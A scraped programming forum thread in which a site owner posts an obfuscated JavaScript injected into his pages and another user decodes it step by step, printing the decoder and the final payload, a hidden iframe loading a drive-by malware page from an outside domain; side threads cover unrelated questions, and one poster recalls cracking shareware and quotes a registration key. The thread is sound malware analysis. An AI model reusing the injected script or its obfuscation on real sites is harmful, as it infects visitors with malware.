|
Is this anything to do with Javascript?
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
Richard MacCutchan wrote: Is this anything to do with Javascript?
Yep! Looks like Pygame is made on top of GameJs (a JavaScript game engine)
Some detail here: http://gamejs.org/[^]
Though, what OP has asked does not connect to a JavaScript question from any angle.
|
|
|
|
|
johtnkucz wrote: No module named pygame That looks like a clear message.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
A hacker added a JavaScript to many html pages of my site. Just after the body-tag he added:
<!--<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--
It somehow directs the browser to a site where the hacker deposited some malware for automatic download.
But I do not understand the details.
try{1-prototype;}catch(asd){x=2;} somehow sets x to 2 - but how does that happen?
v="eva";}if(v)e=window[v+"l"]; somehow creates an eval statement.
f (and then also w ) contain an encrypted statement.
In the for loop, the statement gets decrypted by s=s+fromCharCode((w[j]*1+(9+eval("j%3"))));
and finally executed by e(s); .
Since I hardly ever write JavaScript, I fail to understand the details.
I hope that you have fun with analysing that script, and that you can share some hints on its function.
|
|
|
|
|
The original javascript is the long array of bytes, written as numbers so it is not easy to read it. The part of the code that gets executed just converts the array back to its original script text and executes it. You need to take actions protect your website from this sort of malware injection.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
With the first bit, the try statement - it's code designed to fail, so the catch blocks steps in and sets x = 2.
After I pasted the code, there appeared to be two commas missing from between elements in the array - either that or 2 numbers were broken in half. So I'm still not sure that I've guessed correctly.
After some mind-numbing tracing, I got to a situation where the s in the e(s) statement is equal to:
"
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999e
(9ggsk/tpd!>! iurq;-0msoed.dpfbrjpl/ec0n_jo,qin#<jdsn,je>!%gskJe%<epavncou,cpbz/_qqcoeAijje)ggsk*<~9ujobpx,poj
`c"<hqlCcc="
Which looks like junk to me, so I'll try again to paste the array correctly.
Wouldn't you just love to throttle the sod that did this..
EDIT: Had another try - I had inserted extra commas the first time round - this was clearly wrong. This time I removed the spaces, wrapped it into a funtion and removed the final eval, outputting instead to the console. Here's the re-written code and the final payload. Enjoy!
function injectedCrap()
{
try{1-prototype;}catch(asd){x=2;}
if(x)
{
fr="fromChar";
f=[ 4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,
29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,
97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,
3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,
94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,
50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,
102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,
37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,
90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,
23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,
92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,
101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,
98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,
101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,
93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,
102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1 ];
v="eva";
}
if(v)
e=window[v+"l"];
w=f;
s=[];
r=String;
z=((e)?"Code":"");
zx=fr+z;
for(i=0;288-5+5-i>0;i+=1)
{
j=i;
if(e)
s=s+r[zx]((w[j]*1+(9+e("j%3"))));
}
console.log(s);
}
Which, when all is done and dusted evaluates to this nasty piece of work:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://lundf-creation.de/main.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
Dirty elephanters!
modified 30-Jul-12 7:59am.
|
|
|
|
|
|
Pleasure.
Thanks for something interesting to chew on..
|
|
|
|
|
In case that the hacker comes back (I hope that won't happen...), I'll post his new creation here.
Now I understand how drive-by infections work: open a "harmless" page with the injected script, an iframe is opened outside the visible area, and from there some malware gets installed. Really nice. Fortunately my computer was found clean after a 30 hours scan with 4 virus scanners.
|
|
|
|
|
Bernhard Hiller wrote: from there some malware gets installed Doesn't the browser ask before downloading/launching ANY file or extension? I always believed that I'm pretty safe from malware unless I click "downlad and run". Users get infected due to their gullibility ("scan your computer for problems and give us your credit card number by the way. And a phone number, just in case.") and lack of experience.
Right?
[edit] like this: Yu0Tube - Kareena Kapoor slapped a senior news reporter in a meeting [^] (quite smart, spotted in a commantary on "real" YouTube, but blocking all links is a bit unrealistic)
Greetings - Jacek
|
|
|
|
|
nice job!
That's pretty crafty there, on the original Javascript, an iFrame off the browser window, hidden from view.
Your code is crafty too.
|
|
|
|
|
Thanks Jim.
I've a 20 year history of reversing code - I taught myself to program in x86 ASM during high-school by dissasembling whatever programs I had to hand.
It's just a matter of experience/exposure, I guess.
|
|
|
|
|
So you must be around 48,
I took computer class in summer school of 1974 with wood shop. We had a Western Electric teletype machine, that stored our programs on yellow paper tape with rubber bands.
So we wrote programs in basic on paper, and typed them in, and ran them on a Sigma 7 Mainframe at UC Irvine.
In high school, I dropped computer class and took surf class instead, counted as a PE credit, should of stuck with it. Oh well.
Didn't pick up computers again till 1986, bought a IBM XT, but didn't know what to do with it, so I wrote programs in basic, and ran them off floppy disks. Bought a hard drive 2 years later.
I can reverse engineer a lot of things, but not code down to that level.
|
|
|
|
|
Nah, I'm just a young'n - 35, Wed next week, in fact.
Neato! Dad used to bring home punch cards for us to draw on as kids, back I suppose in about 1982 or so. We had a ball trying to imagine what all the 'dots' were that we were trying to join-up.
I think I was first exposed to Basic in about 1985 or so - A girl down the road had a ?? and I can remember vividly entering a program that would calculate your age in the year 2000 - a time that seemed a million years away. Damn - nearly as far past it now as we were before it, back then!
Isn't it funny where life takes us? I picked up programming when we were forced to occupy the computer-room at school when on detention.. I quickly swiped turbo Pascal 6 and Turbo C++ 3.1 from the network. But when a fellow nerd gave me a copies of his dad's TASM, MASM and Sourcer commenting dissasembler I was like a you-know-what in a you-know where! Still don't know what would have happened if I'd behaved that way I was supposed to back then..
Oh how I do envy you - we got our first piece of computerized anything in about 1990 when M&D spent about $4000 on a 386-33 complete with a whopping 40Mb HDD and 4, thats right count 'em, 4 MB of RAM.. That was an enormous purchase for m&d back then.
I was a bright but lonely kid, so was probably really lucky to have been exposed to computers at that time of my life - I still remember the stunning, overwhelming joy I felt as a 16 year old when I reverse-engineered the registration-code for UniVBE (video bios extender software) and turned shareware software into a registered version.
Heck, I still remember the reg code for Sourcer - B309868-ytht 20 years after I got it..
Now, if only I could reverse engineer people and social situations. :laughs:
Simon.
|
|
|
|
|
I started working for Xerox in 1983, and the office was filled with Xerox Word Processors, a text based system that printed to Diablo Printers. In 1985, we moved to Costa Mesa, and a new secret room was built and filled with Xerox 6065 Documenters, a tall brown tower hooked to 19" monitors, optical mouse, running Xerox Windows attached to a Xerox 2700 Laser Printer via serial cable. I was amazed at it, and started spending time learning how to use them. But all you could do was type a document, save it, and print it, and send and receive email via the internet. Yes we had internet back then.
They couldn't sell a single one starting at $40K each. At the same time, UC Irvine was one of my customers, and I started seeing all these IBM PC's popping up everywhere running WordStar, with Diablo Daisywheel printers.
So I thought to myself, I better buy one of those, they look like the future. Spent a whopping $2200 on it, with 128K of ram. My dad was a merchant marine, and thought it was a complete waste of money. Little did I know that those little beige boxes with green monitors would take off.
That's the story.
I'm sure everyone has a great story, should of took this to the lounge.
|
|
|
|
|
haha, you beat me, today i saw it and i found the same function. well, reading this hacking code i learned few sh*t today
like you can call a function of a object as string indexed array
i.e.
console.log( String["fromCharCode"](100));
i had no idea that is allowed in js
But the fact which is still poking me. How on earth the hacker managed to injact the code to the orginal code in the server???????????????????????????????????????
I wish I could believe there is an after life.
|
|
|
|
|
Mohibur Rashid wrote: But the fact which is still poking me. How on earth the hacker managed to injact the code to the orginal code in the server?
Indeed. I've often wondered about these things myself. Is it (a) a modification to the file stored on the server, or (b) an in-transit modification to the html payload (as some hotels and ISPs are known to do).
It sure is the pow(2,6) dollar question.
Make it work. Then do it better - Andrei Straut
|
|
|
|
|
please send me ajax simple program.......
|
|
|
|
|
See my answer to your other question.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
|
Try a Google search; you will find lots of information.
One of these days I'm going to think of a really clever signature.
|
|
|
|
|
|
I know that they are a rather good Dutch football team.
|
|
|
|
|
|
It's easy to crop,rotate,change colors of images.I want to use some senior image porcessing functions like DCT or FFT on HTML5 canvas? Is there any ready-made libs?
crop
<a href="http://www.webresourcesdepot.com/jquery-image-crop-plugin-jcrop">http://www.webresourcesdepot.com/jquery-image-crop-plugin-jcrop</a>[<a href="http://www.webresourcesdepot.com/jquery-image-crop-plugin-jcrop" target="_blank" title="New Window">^</a>]
rotate
<a href="http://code.google.com/p/jquery-rotate/">http://code.google.com/p/jquery-rotate/</a>[<a href="http://code.google.com/p/jquery-rotate/" target="_blank" title="New Window">^</a>]
change colors
<a href="http://github.com/mezzoblue/PaintbrushJS">http://github.com/mezzoblue/PaintbrushJS</a>[<a href="http://github.com/mezzoblue/PaintbrushJS" target="_blank" title="New Window">^</a>]
dct
<a href="http://en.wikipedia.org/wiki/Discrete_cosine_transform">http://en.wikipedia.org/wiki/Discrete_cosine_transform</a>[<a href="http://en.wikipedia.org/wiki/Discrete_cosine_transform" target="_blank" title="New Window">^</a>]
fft
<a href="http://en.wikipedia.org/wiki/Fft">http://en.wikipedia.org/wiki/Fft</a>[<a href="http://en.wikipedia.org/wiki/Fft" target="_blank" title="New Window">^</a>]
javascript dct fft
|
|
|
|
|